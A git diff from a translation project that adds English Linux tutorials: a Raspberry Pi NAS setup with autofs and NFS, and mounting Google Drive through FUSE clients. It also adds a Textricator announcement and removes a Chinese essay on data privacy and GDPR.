|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/scottnesbitt
|
||||||
|
[1]:http://gnac.sourceforge.net
|
||||||
|
[2]:http://www.gstreamer.net/
|
||||||
|
[3]:http://soundconverter.org/
|
||||||
|
[4]:https://www.biggmatt.com/winff/
|
||||||
|
[5]:https://opensource.com/article/17/6/ffmpeg-convert-media-file-formats
|
||||||
|
[6]:http://www.mirovideoconverter.com/
|
||||||
|
[7]:https://en.wikipedia.org/wiki/WebM
|
||||||
|
[8]:https://en.wikipedia.org/wiki/Ogg_theora
|
@ -0,0 +1,284 @@
Building a network attached storage device with a Raspberry Pi
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus-storage.png?itok=95-zvHYl)

In this three-part series, I'll explain how to set up a simple, useful NAS (network attached storage) system. I use this kind of setup to store my files on a central system, creating incremental backups automatically every night. To mount the disk on devices that are located in the same network, NFS is installed. To access files offline and share them with friends, I use [Nextcloud][1].

This article will cover the basic setup of software and hardware to mount the data disk on a remote device. In the second article, I will discuss a backup strategy and set up a cron job to create daily backups. In the third and last article, we will install Nextcloud, a tool for easy file access to devices synced offline as well as online using a web interface. It supports multiple users and public file-sharing so you can share pictures with friends, for example, by sending a password-protected link.

The target architecture of our system looks like this:

![](https://opensource.com/sites/default/files/uploads/nas_part1.png)

### Hardware

Let's get started with the hardware you need. You might come up with a different shopping list, so consider this one an example.

The computing power is delivered by a [Raspberry Pi 3][2], which comes with a quad-core CPU, a gigabyte of RAM, and (somewhat) fast ethernet. Data will be stored on two USB hard drives (I use 1-TB disks); one is used for the everyday traffic, the other is used to store backups. Be sure to use either active USB hard drives or a USB hub with an additional power supply, as the Raspberry Pi will not be able to power two USB drives.

### Software

The operating system with the highest visibility in the community is [Raspbian][3], which is excellent for custom projects. There are plenty of [guides][4] that explain how to install Raspbian on a Raspberry Pi, so I won't go into details here. The latest officially supported version at the time of this writing is [Raspbian Stretch][5], which worked fine for me.

At this point, I will assume you have configured your basic Raspbian and are able to connect to the Raspberry Pi by `ssh`.

### Prepare the USB drives

To achieve good performance reading from and writing to the USB hard drives, I recommend formatting them with ext4. To do so, you must first find out which disks are attached to the Raspberry Pi. You can find the disk devices in `/dev/sd<x>`. Using the command `fdisk -l`, you can find out which two USB drives you just attached. Please note that all data on the USB drives will be lost as soon as you follow these steps.

```
pi@raspberrypi:~ $ sudo fdisk -l

<...>

Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xe8900690

Device     Boot Start        End    Sectors   Size Id Type
/dev/sda1        2048 1953525167 1953523120 931.5G 83 Linux


Disk /dev/sdb: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6aa4f598

Device     Boot Start        End    Sectors   Size Id Type
/dev/sdb1  *     2048 1953521663 1953519616 931.5G 83 Linux
```

As those devices are the only 1TB disks attached to the Raspberry Pi, we can easily see that `/dev/sda` and `/dev/sdb` are the two USB drives. The partition table at the end of each disk shows how it should look after the following steps, which create the partition table and format the disks. To do this, repeat the following steps for each of the two devices by replacing `sda` with `sdb` the second time (assuming your devices are also listed as `/dev/sda` and `/dev/sdb` in `fdisk`).

First, delete the partition table of the disk and create a new one containing only one partition. In `fdisk`, you can use interactive one-letter commands to tell the program what to do. Simply insert them after the prompt `Command (m for help):` as follows (you can also use the `m` command anytime to get more information):

```
pi@raspberrypi:~ $ sudo fdisk /dev/sda

Welcome to fdisk (util-linux 2.29.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.


Command (m for help): o
Created a new DOS disklabel with disk identifier 0x9c310964.

Command (m for help): n
Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-1953525167, default 2048):
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):

Created a new partition 1 of type 'Linux' and of size 931.5 GiB.

Command (m for help): p
Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x9c310964

Device     Boot Start        End    Sectors   Size Id Type
/dev/sda1        2048 1953525167 1953523120 931.5G 83 Linux

Command (m for help): w
The partition table has been altered.
Syncing disks.
```
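If you want to script this instead of typing the dialogue twice, the same single-partition layout can be created non-interactively with `sfdisk` (part of util-linux; this tool is not mentioned in the original text, so treat it as an alternative sketch). The example below deliberately runs against a scratch image file rather than a real `/dev/sdX`:

```
# Create a scratch "disk" so nothing real is touched.
img=$(mktemp)
truncate -s 100M "$img"

# One primary Linux (type 83) partition spanning the whole disk,
# equivalent to the o/n/w dialogue above.
echo 'type=83' | sfdisk "$img"

# Inspect the resulting partition table.
sfdisk -l "$img"
```

On a real drive you would replace `"$img"` with the device path (e.g. `/dev/sda`) and run it with `sudo`.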
Now we will format the newly created partition `/dev/sda1` using the ext4 filesystem:

```
pi@raspberrypi:~ $ sudo mkfs.ext4 /dev/sda1
mke2fs 1.43.4 (31-Jan-2017)
Discarding device blocks: done

<...>

Allocating group tables: done
Writing inode tables: done
Creating journal (1024 blocks): done
Writing superblocks and filesystem accounting information: done
```

After repeating the above steps, let's label the new partitions according to their usage in your system:

```
pi@raspberrypi:~ $ sudo e2label /dev/sda1 data
pi@raspberrypi:~ $ sudo e2label /dev/sdb1 backup
```

Now let's get those disks mounted to store some data. My experience, based on running this setup for over a year now, is that USB drives are not always available to get mounted when the Raspberry Pi boots up (for example, after a power outage), so I recommend using autofs to mount them when needed.

First install autofs and create the mount point for the storage:

```
pi@raspberrypi:~ $ sudo apt install autofs
pi@raspberrypi:~ $ sudo mkdir /nas
```

Then mount the devices by adding the following line to `/etc/auto.master`:

```
/nas /etc/auto.usb
```

If the file `/etc/auto.usb` does not exist yet, create it with the following content:

```
data -fstype=ext4,rw :/dev/disk/by-label/data
backup -fstype=ext4,rw :/dev/disk/by-label/backup
```

Then restart the autofs service:

```
pi@raspberrypi3:~ $ sudo service autofs restart
```

Now you should be able to access the disks at `/nas/data` and `/nas/backup`, respectively. Clearly, the content will not be too thrilling, as you just erased all the data from the disks. Nevertheless, you should be able to verify the devices are mounted by executing the following commands:

```
pi@raspberrypi3:~ $ cd /nas/data
pi@raspberrypi3:/nas/data $ cd /nas/backup
pi@raspberrypi3:/nas/backup $ mount
<...>
/etc/auto.usb on /nas type autofs (rw,relatime,fd=6,pgrp=463,timeout=300,minproto=5,maxproto=5,indirect)
<...>
/dev/sda1 on /nas/data type ext4 (rw,relatime,data=ordered)
/dev/sdb1 on /nas/backup type ext4 (rw,relatime,data=ordered)
```

First move into the directories to make sure autofs mounts the devices. Autofs tracks access to the filesystems and mounts the needed devices on the go. Then the `mount` command shows that the two devices are actually mounted where we wanted them.

Setting up autofs is a bit error-prone, so do not get frustrated if mounting doesn't work on the first try. Give it another chance, search for more detailed resources (there is plenty of documentation online), or leave a comment.

### Mount network storage

Now that you have set up the basic network storage, we want it to be mounted on a remote Linux machine. We will use the network file system (NFS) for this. First, install the NFS server on the Raspberry Pi:

```
pi@raspberrypi:~ $ sudo apt install nfs-kernel-server
```

Next, we need to tell the NFS server to expose the `/nas/data` directory, which will be the only device accessible from outside the Raspberry Pi (the other one will be used for backups only). To export the directory, edit the file `/etc/exports` and add the following line to allow all devices with access to the NAS to mount your storage:

```
/nas/data *(rw,sync,no_subtree_check)
```

For more information about restricting the mount to single devices and so on, refer to `man exports`. In the configuration above, anyone will be able to mount your data as long as they have access to the ports needed by NFS: `111` and `2049`. I use the configuration above and, via the router's firewall, allow access to my home network only on ports 22 and 443. That way, only devices in the home network can reach the NFS server.

To mount the storage on a Linux computer, run the commands:

```
you@desktop:~ $ sudo mkdir /nas/data
you@desktop:~ $ sudo mount -t nfs <raspberry-pi-hostname-or-ip>:/nas/data /nas/data
```

Again, I recommend using autofs to mount this network device. For extra help, check out [How to use autofs to mount NFS shares][6].
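As a rough sketch of what that client-side autofs setup could look like (the map file name and the `/mnt/nas` mount point are illustrative assumptions, not from the article):

```
# /etc/auto.master on the client: serve /mnt/nas from a dedicated map file
/mnt/nas  /etc/auto.nfs

# /etc/auto.nfs: mount the exported directory on demand
data  -fstype=nfs,rw  <raspberry-pi-hostname-or-ip>:/nas/data
```

After restarting autofs on the client, accessing `/mnt/nas/data` should trigger the NFS mount.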
Now you are able to access files stored on your own Raspberry Pi-powered NAS from remote devices using the NFS mount. In the next part of this series, I will cover how to automatically back up your data to the second hard drive using `rsync`. To save space on the device while still doing daily backups, you will learn how to create incremental backups with `rsync`.
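To preview the idea behind those incremental backups, here is a minimal, self-contained sketch; the scratch directories stand in for `/nas/data` and `/nas/backup`, and the real setup in part two may differ. `rsync --link-dest` copies only changed files and hard-links unchanged ones against the previous snapshot:

```
# Scratch directories standing in for the data disk and the backup disk.
src=$(mktemp -d)
dst=$(mktemp -d)
echo "hello" > "$src/file.txt"

# First run: a full copy.
rsync -a "$src/" "$dst/backup-1/"

# Second run: unchanged files are hard-linked against the previous backup,
# so each snapshot looks complete but costs almost no extra space.
rsync -a --link-dest="$dst/backup-1" "$src/" "$dst/backup-2/"

# Both snapshots reference the same inode for the unchanged file.
stat -c %i "$dst/backup-1/file.txt" "$dst/backup-2/file.txt"
```

A daily cron job would then create one such `--link-dest` snapshot per day, each linked against the previous one.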

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/network-attached-storage-Raspberry-Pi

作者:[Manuel Dewald][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/ntlx
[1]:https://nextcloud.com/
[2]:https://www.raspberrypi.org/products/raspberry-pi-3-model-b/
[3]:https://www.raspbian.org/
[4]:https://www.raspberrypi.org/documentation/installation/installing-images/
[5]:https://www.raspberrypi.org/blog/raspbian-stretch/
[6]:https://opensource.com/article/18/6/using-autofs-mount-nfs-shares
@ -0,0 +1,265 @@
How To Mount Google Drive Locally As Virtual File System In Linux
======

![](https://www.ostechnix.com/wp-content/uploads/2018/07/Google-Drive-720x340.png)

[**Google Drive**][1] is one of the most popular cloud storage providers on the planet. As of 2017, over 800 million users were actively using the service worldwide. Even though the number of users has increased dramatically, Google hasn't released an official Google Drive client for Linux yet. But that didn't stop the Linux community. Every now and then, developers have brought out Google Drive clients for the Linux operating system. In this guide, we will look at three unofficial Google Drive clients for Linux. Using these clients, you can mount Google Drive locally as a virtual file system and access your Drive files from your Linux box. Read on.

### 1. Google-drive-ocamlfuse

**google-drive-ocamlfuse** is a FUSE filesystem for Google Drive, written in OCaml. For those wondering, FUSE stands for **F**ilesystem in **Use**rspace, a project that allows users to create virtual file systems at the user level. **google-drive-ocamlfuse** allows you to mount your Google Drive on a Linux system. It features read/write access to ordinary files and folders, read-only access to Google Docs, Sheets, and Slides, support for multiple Google Drive accounts, duplicate file handling, access to your Drive trash directory, and more.

#### Installing google-drive-ocamlfuse

google-drive-ocamlfuse is available in the [**AUR**][2], so you can install it using any AUR helper program, for example [**Yay**][3].

```
$ yay -S google-drive-ocamlfuse
```

On Ubuntu:

```
$ sudo add-apt-repository ppa:alessandro-strada/ppa
$ sudo apt-get update
$ sudo apt-get install google-drive-ocamlfuse
```

To install the latest beta version, do:

```
$ sudo add-apt-repository ppa:alessandro-strada/google-drive-ocamlfuse-beta
$ sudo apt-get update
$ sudo apt-get install google-drive-ocamlfuse
```

#### Usage

Once installed, run the following command to launch the **google-drive-ocamlfuse** utility from your Terminal:

```
$ google-drive-ocamlfuse
```

When you run this for the first time, the utility will open your web browser and ask for permission to access your Google Drive files. Once you grant authorization, all the configuration files and folders it needs to mount your Google Drive are created automatically.

![][5]

After successful authentication, you will see the following message in your Terminal.

```
Access token retrieved correctly.
```

You’re good to go now. Close the web browser and then create a mount point to mount your Google Drive files.

```
$ mkdir ~/mygoogledrive
```

Finally, mount your Google Drive using the command:

```
$ google-drive-ocamlfuse ~/mygoogledrive
```

Congratulations! You can access your files either from the Terminal or a file manager.

From the **Terminal**:

```
$ ls ~/mygoogledrive
```

From the **File manager**:

![][6]

If you have more than one account, use the **label** option to distinguish between accounts like below.

```
$ google-drive-ocamlfuse -label label [mountpoint]
```

Once you’re done, unmount the FUSE filesystem using the command:

```
$ fusermount -u ~/mygoogledrive
```

For more details, refer to the help output.

```
$ google-drive-ocamlfuse --help
```

Also, check the [**official wiki**][7] and the [**project GitHub repository**][8] for more details.

### 2. GCSF

**GCSF** is a FUSE filesystem based on Google Drive, written in the **Rust** programming language. The name GCSF comes from the Romanian phrase “**G**oogle **C**onduce **S**istem de **F**ișiere”, which means “Google Drive Filesystem” in English. Using GCSF, you can mount your Google Drive as a local virtual file system and access the contents from the Terminal or file manager. You might wonder how it differs from other Google Drive FUSE projects, for example **google-drive-ocamlfuse**. The developer of GCSF replied to a similar [comment on Reddit][9]: “GCSF tends to be faster in several cases (listing files recursively, reading large files from Drive). The caching strategy it uses also leads to very fast reads (x4-7 improvement compared to google-drive-ocamlfuse) for files that have been cached, at the cost of using more RAM.”

#### Installing GCSF

GCSF is available in the [**AUR**][10], so Arch Linux users can install it using any AUR helper, for example [**Yay**][3].

```
$ yay -S gcsf-git
```

For other distributions, do the following.

Make sure you have installed Rust on your system.

Make sure the **pkg-config** and **fuse** packages are installed. They are available in the default repositories of most Linux distributions. For example, on Ubuntu and derivatives, you can install them using the command:

```
$ sudo apt-get install -y libfuse-dev pkg-config
```

Once all dependencies are installed, run the following command to install GCSF:

```
$ cargo install gcsf
```

#### Usage

First, we need to authorize our Google Drive. To do so, simply run:

```
$ gcsf login ostechnix
```

You must specify a session name. Replace **ostechnix** with your own session name. You will see output something like below, with a URL to authorize your Google Drive account.

![][11]

Just copy the above URL, navigate to it in your browser, and click **allow** to grant permission to access your Google Drive contents. Once you grant access, you will see output like below.

```
Successfully logged in. Credentials saved to "/home/sk/.config/gcsf/ostechnix".
```

GCSF will create a configuration file in **$XDG_CONFIG_HOME/gcsf/gcsf.toml**, which is usually defined as **$HOME/.config/gcsf/gcsf.toml**. Credentials are stored in the same directory.

Next, create a directory to mount your Google Drive contents.

```
$ mkdir ~/mygoogledrive
```

Then, edit the **/etc/fuse.conf** file:

```
$ sudo vi /etc/fuse.conf
```

Uncomment the following line to allow non-root users to specify the `allow_other` or `allow_root` mount options.

```
user_allow_other
```

Save and close the file.

Finally, mount your Google Drive using the command:

```
$ gcsf mount ~/mygoogledrive -s ostechnix
```

Sample output:

```
INFO gcsf > Creating and populating file system...
INFO gcsf > File sytem created.
INFO gcsf > Mounting to /home/sk/mygoogledrive
INFO gcsf > Mounted to /home/sk/mygoogledrive
INFO gcsf::gcsf::file_manager > Checking for changes and possibly applying them.
INFO gcsf::gcsf::file_manager > Checking for changes and possibly applying them.
```

Again, replace **ostechnix** with your session name. You can view the existing sessions using the command:

```
$ gcsf list
Sessions:
- ostechnix
```

You can now access your Google Drive contents either from the Terminal or from a file manager.

From the **Terminal**:

```
$ ls ~/mygoogledrive
```

From the **File manager**:

![][12]

If you don’t know where your Google Drive is mounted, use the **df** or **mount** command as shown below.

```
$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            968M     0  968M   0% /dev
tmpfs           200M  1.6M  198M   1% /run
/dev/sda1        20G  7.5G   12G  41% /
tmpfs           997M     0  997M   0% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           997M     0  997M   0% /sys/fs/cgroup
tmpfs           200M   40K  200M   1% /run/user/1000
GCSF             15G  857M   15G   6% /home/sk/mygoogledrive

$ mount | grep GCSF
GCSF on /home/sk/mygoogledrive type fuse (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000,allow_other)
```

Once done, unmount the Google Drive using the command:

```
$ fusermount -u ~/mygoogledrive
```

Check the [**GCSF GitHub repository**][13] for more details.

### 3. Tuxdrive

**Tuxdrive** is yet another unofficial Google Drive client for Linux. We wrote a detailed guide about Tuxdrive a while ago.

Of course, there were a few other unofficial Google Drive clients available in the past, such as Grive2 and Syncdrive, but they seem to be discontinued now. I will keep updating this list when I come across any active Google Drive clients.

And, that’s all for now, folks. Hope this was useful. More good stuff to come. Stay tuned!

Cheers!

--------------------------------------------------------------------------------

via: https://www.ostechnix.com/how-to-mount-google-drive-locally-as-virtual-file-system-in-linux/

作者:[SK][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.ostechnix.com/author/sk/
[1]:https://www.google.com/drive/
[2]:https://aur.archlinux.org/packages/google-drive-ocamlfuse/
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
[5]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive.png
[6]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-2.png
[7]:https://github.com/astrada/google-drive-ocamlfuse/wiki/Configuration
[8]:https://github.com/astrada/google-drive-ocamlfuse
[9]:https://www.reddit.com/r/DataHoarder/comments/8vlb2v/google_drive_as_a_file_system/e1oh9q9/
[10]:https://aur.archlinux.org/packages/gcsf-git/
[11]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-3.png
[12]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-4.png
[13]:https://github.com/harababurel/gcsf
@ -0,0 +1,42 @@
translating---geelkpi

Textricator: Data extraction made simple
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/document_free_access_cut_security.png?itok=ocvCv8G2)

You probably know the feeling: You ask for data and get a positive response, only to open the email and find a whole bunch of PDFs attached. Data, interrupted.

We understand your frustration, and we’ve done something about it: Introducing [Textricator][1], our first open source product.

We’re Measures for Justice, a criminal justice research and transparency organization. Our mission is to provide data transparency for the entire justice system, from arrest to post-conviction. We do this by producing a series of up to 32 performance measures covering the entire criminal justice system, county by county. We get our data in many ways—all legal, of course—and while many state and county agencies are data-savvy, giving us quality, formatted data in CSVs, the data is often bundled inside software with no simple way to get it out. PDF reports are the best they can offer.

Developers Joe Hale and Stephen Byrne have spent the past two years developing Textricator to extract tens of thousands of pages of data for our internal use. Textricator can process just about any text-based PDF format—not just tables, but complex reports with wrapping text and detail sections generated from tools like Crystal Reports. Simply tell Textricator the attributes of the fields you want to collect, and it chomps through the document, collecting and writing out your records.

Not a software engineer? Textricator doesn’t require programming skills; rather, the user describes the structure of the PDF and Textricator handles the rest. Most users run it via the command line; however, a browser-based GUI is available.

We evaluated other great open source solutions like [Tabula][2], but they just couldn’t handle the structure of some of the PDFs we needed to scrape. “Textricator is both flexible and powerful and has cut the time we spend to process large datasets from days to hours,” says Andrew Branch, director of technology.

At MFJ, we’re committed to transparency and knowledge-sharing, which includes making our software available to anyone, especially those trying to free and share data publicly. Textricator is available on [GitHub][3] and released under [GNU Affero General Public License Version 3][4].

You can see the results of our work, including data processed via Textricator, on our free [online data portal][5]. Textricator is an essential part of our process and we hope civic tech and government organizations alike can unlock more data with this new tool.

If you use Textricator, let us know how it helped solve your data problem. Want to improve it? Submit a pull request.

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/textricator

作者:[Stephen Byrne][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:
[1]:https://textricator.mfj.io/
[2]:https://tabula.technology/
[3]:https://github.com/measuresforjustice/textricator
[4]:https://www.gnu.org/licenses/agpl-3.0.en.html
[5]:https://www.measuresforjustice.org/portal/
@ -1,95 +0,0 @@
对数据隐私持开放的态度
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_opendata.png?itok=M8L2HGVx)

Image by : opensource.com

今天是[数据隐私日][1](在欧洲叫“数据保护日”),你可能会认为现在我们处于一个开源的世界中,所有的数据都应该是自由的,[就像人们想的那样][2],但是现实并没那么简单。主要有两个原因:

1. 我们中的大多数(不仅仅是在开源中)认为至少有些关于我们自己的数据是不愿意分享出去的(我在之前发表的一篇文章中列举了一些例子[3])
2. 我们很多人虽然在开源中工作,但事实上是为了一些商业公司或者其他一些组织工作,也是在合法的要求范围内分享数据。

所以实际上,数据隐私对于每个人来说是很重要的。

事实证明,在美国和欧洲之间,人们和政府认为让组织使用哪些数据的出发点是有些不同的。前者通常为商业实体(特别是愤世嫉俗的人们会指出是大型的商业实体)利用他们所收集到的关于我们的数据提供了更多的自由度。在欧洲,完全是另一观念,一直以来持有的多是有更多约束限制的观念,而且在 5 月 25 日,欧洲的观点可以说取得了胜利。

### 通用数据保护条例(GDPR)的影响

那是一个相当全面的声明,其实事实上这是 2016 年欧盟通过的一项称之为通用数据保护条例(GDPR)的立法的生效日期。通用数据保护条例在私人数据怎样才能被保存,如何才能被使用,谁能使用,能被持有多长时间这些方面设置了严格的规则。它描述了什么数据属于私人数据——而且涉及的条目范围非常广泛,从你的姓名、家庭住址到你的医疗记录以及接通你电脑的 IP 地址。

通用数据保护条例的重要之处是它并不仅仅适用于欧洲的公司,如果你是阿根廷人、日本人、美国人或者是俄罗斯的公司而且你正在收集涉及到欧盟居民的数据,你就要受到这个条例的约束管辖。

“哼!” 你可能会这样说^注1 ,“我的业务不在欧洲:他们能对我有啥约束?” 答案很简单:如果你想继续在欧盟做任何生意,你最好遵守,因为一旦你违反了通用数据保护条例的规则,你将会受到你的全球总收入百分之四的惩罚。是的,你没听错,是全球总收入,而不是仅仅在欧盟某一国家的收入,也不只是净利润,而是全球总收入。这将会让你去叮嘱告知你的法律团队,他们就会知会你的整个团队,同时也会立即去指引你的 IT 团队,确保你的行为在相当短的时间内合规。

看上去这和非欧盟公民没有什么相关性,但其实不然,对大多数公司来说,对所有的他们的顾客、合作伙伴以及员工实行同样的数据保护措施是件既简单又有效的事情,而不是仅针对欧盟公民实施,这将会是一件很有利的事情。^注2

然而,通用数据保护条例不久将在全球产生影响并不意味着一切都会变得很美好:事实并非如此,我们一直在交出关于我们自己的信息——而且允许公司去使用它。

有一句话是这么说的(尽管很有争议):“如果你没有在付费,那么你就是产品。”这句话的意思就是如果你没有为某一项服务付费,那么其他的人就在付费使用你的数据。

你有付费使用 Facebook、推特、谷歌邮箱吗?你觉得他们是如何赚钱的?大部分是通过广告,一些人会争论那只是他们向你提供的一项服务而已,但事实上是他们在利用你的数据从广告商那里获取收益。你不是广告的真正顾客——只有当你看了广告后买了他们的商品之后你才变成了他们的顾客,但在此之前,都只是广告平台和广告商之间的关系。

有些服务是允许你通过付费来消除广告的(流媒体音乐平台 Spotify 就是这样的),但从另一方面来讲,即使是付费的服务也可能投放广告(例如,亚马逊正在允许通过 Alexa 投放广告)。除非我们想要开始为这些所有的“免费”服务付费,否则我们需要清楚我们所放弃的是什么,并在我们愿意公开和不愿意公开的数据之间做出一些选择。

### 谁是顾客?

关于数据的另一个问题一直在困扰着我们,它是所产生的数据量的直接结果。有许多组织一直在产生巨量的数据,包括公共的组织,比如大学、医院或者是政府部门^注4 ——而且他们没有能力去储存这些数据。如果这些数据没有长久的价值也就没什么要紧的,但事实正好相反,随着处理大数据的工具不断被开发出来,这些组织也认识到他们现在以及在不久的将来将能够去挖掘这些数据。

然而他们面临的问题是,随着数据的增长和存储能力的不足,他们该如何处理。幸运的是——我是带有讽刺意味地使用了这个词^注5 ,大公司正在介入去帮助他们。“把你们的数据给我们,”他们说,“我们将免费保存。我们甚至让你随时能够使用你所收集到的数据!”这听起来很棒,是吗?这是大公司^注6 的一个极具代表性的例子,站在慈善的立场上帮助公共组织管理他们收集到的关于我们的数据。

不幸的是,慈善不是唯一的理由。这些帮助是附有条件的:作为同意保存数据的交换条件,这些公司得到了将数据访问权限出售给第三方的权利。你认为公共组织,或者是被收集数据的人,在数据访问权被出售给第三方之后,对数据如何使用还能有发言权吗?我将把这个问题当做一个练习留给读者去思考。^注7

### 开放和积极

然而并不只有坏消息。政府中有一项在逐渐发展起来的“开放数据”运动,鼓励政府部门将他们的数据免费开放给公众或者其他组织。这项行动目前正在被立法推动。许多志愿组织——尤其是那些接受公共基金的——也正在开始推动同样的活动。即使商业组织也有些许的兴趣。而且,在技术上已经可行了,例如围绕差分隐私和多方安全计算的技术,正在允许我们在不暴露太多个人信息的前提下跨数据集进行挖掘——这个历史性的计算难题比你想象的要容易处理得多。

这些对我们来说意味着什么呢?我之前在 Opensource.com 上写过关于[开源的共同福利][4]的文章,而且我越来越相信我们需要把我们的视野从软件拓展到其他领域:硬件、组织,以及与这次讨论有关的,数据。让我们假设一下,你是 A 公司,要向另一家公司(客户 B)提供一项服务。^注8 这里有四种不同类型的数据:

1. 数据完全开放:对 A 和 B 都是可得到的,世界上任何人都可以得到
2. 数据是已知的、共享的、保密的:A 和 B 可得到,但其他人不能得到
3. 数据是公司级别保密的:A 公司可以得到,但 B 顾客不能
4. 数据是顾客级别保密的:B 顾客可以得到,但 A 公司不能
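
上面的四种类别可以用一个简单的访问控制模型来示意。下面是一个示意性的 Python 草图(其中的类名、函数名和参与方标识都是为说明而假设的,并非文中提到的任何真实系统):

```python
from enum import Enum

class Visibility(Enum):
    """文中描述的四种数据可见性类别。"""
    OPEN = 1                  # 选项一:完全开放,任何人可见
    SHARED_CONFIDENTIAL = 2   # 选项二:A 和 B 共享,但对外保密
    COMPANY_ONLY = 3          # 选项三:仅 A 公司可见
    CUSTOMER_ONLY = 4         # 选项四:仅 B 顾客可见

def can_access(party: str, visibility: Visibility) -> bool:
    """判断某一方("A"、"B" 或 "public")能否访问给定类别的数据。"""
    if visibility is Visibility.OPEN:
        return True
    if visibility is Visibility.SHARED_CONFIDENTIAL:
        return party in ("A", "B")
    if visibility is Visibility.COMPANY_ONLY:
        return party == "A"
    return party == "B"  # CUSTOMER_ONLY
```

文中接下来的问题,本质上就是:能否在保持后三类数据细节保密的同时,让它们以第一类(OPEN)的方式被利用。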

首先,也许我们对数据应该更开放些,将数据默认放到选项一中。如果那些数据对所有人开放,它在无人驾驶、语音识别、矿藏以及人口统计数据等领域将会有相当大的作用。^注9

如果我们能够找到方法,将选项二、三和四中的数据——或者至少它们中的一些——以选项一的方式利用,同时仍将细节保密,那不是很好吗?这就是研究这些新技术的希望所在。然而还有很长的路要走,所以不要太兴奋,同时,可以开始考虑将你的一些数据默认开放。

### 一些具体的措施

我们如何处理数据的隐私和开放?下面是我想到的一些具体的措施:欢迎大家评论做出更多的贡献。

* 检查你的组织是否正在认真严格地执行通用数据保护条例。如果没有,去推动实施它。
* 要默认加密敏感数据(或者适当的时候用散列算法),当不再需要的时候及时删掉——除非数据正在被处理使用,否则没有任何借口让数据以明文形式可见。
* 当你注册一个服务的时候考虑一下你公开了什么信息,特别是社交媒体类的。
* 和你的非技术朋友讨论这个话题。
* 教育你的孩子、你朋友的孩子以及他们的朋友。更好的做法是,去他们的学校和老师交谈,在学校里做宣讲。
* 鼓励你工作或志愿服务的组织,或者与其互动的组织,推动数据的默认开放。不要先去思考“为什么我要使数据开放”,而是从“为什么我不让数据开放”开始。
* 尝试去访问一些开放数据。挖掘使用它,开发应用来使用它,进行数据分析,画漂亮的图,^注10 制作有趣的音乐,考虑使用它来做些事。告诉组织去使用它们,感谢它们,而且鼓励他们去做更多。

注:

1. 我承认你可能并不会。
2. 假设你坚信你的个人数据应该被保护。
3. 如果你在思考“极好的”的寓意,在这点上你并不孤独。
4. 事实上这些机构能够有多开放取决于你所居住的地方。
5. 鉴于我是英国人,那是非常大剂量的讽刺。
6. 他们可能是巨大的公司:没有其他人能够负担得起这么大的存储和基础架构来使数据保持可用。
7. 不,答案是“不”。
8. 尽管这个例子也同样适用于个人。看看:A 可能是 Alice,B 可能是 Bob……
9. 并不是说我们应该暴露个人的数据或者是应该被保密的数据,当然——不是那类的数据。
10. 我的一个朋友发现每当她去接孩子放学的时候总是下雨,所以为了验证这不是确认偏误,她在整个学年都记录了天气信息并制作了图表分享到社交媒体上。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/1/being-open-about-data-privacy

作者:[Mike Bursell][a]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者FelixYFZ](https://github.com/FelixYFZ)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/mikecamel
[1]:https://en.wikipedia.org/wiki/Data_Privacy_Day
[2]:https://en.wikipedia.org/wiki/Information_wants_to_be_free
[3]:https://aliceevebob.wordpress.com/2017/06/06/helping-our-governments-differently/
[4]:https://opensource.com/article/17/11/commonwealth-open-source
[5]:http://www.outpost9.com/reference/jargon/jargon_40.html#TAG2036
@ -1,130 +0,0 @@
IT 自动化的下一步是什么:6 大趋势
======

